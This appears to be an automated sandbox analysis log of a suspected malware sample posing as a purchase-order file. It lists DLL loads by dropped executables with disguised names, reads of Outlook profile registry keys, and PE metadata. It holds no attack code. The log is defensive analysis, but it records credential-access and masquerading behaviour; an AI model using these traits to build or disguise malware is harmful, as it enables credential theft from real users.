Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\alg.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\alg.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\alg.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\alg.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\alg.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\alg.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\alg.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\alg.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\alg.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\alg.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\alg.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\alg.exe	Section loaded: webio.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\alg.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\alg.exe	Section loaded: drprov.dll
Source: C:\Windows\System32\alg.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\alg.exe	Section loaded: ntlanman.dll
Source: C:\Windows\System32\alg.exe	Section loaded: davclnt.dll
Source: C:\Windows\System32\alg.exe	Section loaded: davhlpr.dll
Source: C:\Windows\System32\alg.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\alg.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\alg.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\alg.exe	Section loaded: browcli.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: appvpolicy.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\AppVClient.exe	Section loaded: appmanagementconfiguration.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: version.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: tapi32.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: credui.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: fxstiff.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: fxsresm.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: ualapi.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: mpr.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: mpr.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: PO_2024_056209_MQ04865_ENQ_1045.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PO_2024_056209_MQ04865_ENQ_1045.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: PO_2024_056209_MQ04865_ENQ_1045.exe

Static file information: File size 1442304 > 1048576

Source: PO_2024_056209_MQ04865_ENQ_1045.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x15cc00

Source: PO_2024_056209_MQ04865_ENQ_1045.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 0000000B.00000003.2296140899.0000000001590000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: GoogleUpdateCore_unsigned.pdb source: GoogleUpdateCore.exe.11.dr
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 0000000B.00000003.2355912199.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2354806211.0000000000790000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2390611024.0000000000400000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 0000000B.00000003.1895950529.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 0000000B.00000003.2117234182.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 0000000B.00000003.2117234182.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdb source: alg.exe, 0000000B.00000003.2141944111.00000000015D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdbGCTL source: alg.exe, 0000000B.00000003.2472348411.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2468389247.00000000007D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\e\src\out\Release_x64\setup.exe.pdbOGP source: setup.exe0.11.dr
Source:	Binary string: _.pdb source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1750433396.00000000012A1000.00000004.00000020.00020000.00000000.sdmp, PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1769417350.0000000003700000.00000004.08000000.00040000.00000000.sdmp, PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1793222374.00000000049A5000.00000004.00000800.00020000.00000000.sdmp, PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1758588393.0000000003533000.00000004.00000020.00020000.00000000.sdmp, zeXKjViL.exe, 00000022.00000002.2045260394.0000000004723000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: crashreporter.pdb source: alg.exe, 0000000B.00000003.2627135802.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 0000000B.00000003.2057910358.0000000001480000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: rmiregistry.exe.11.dr
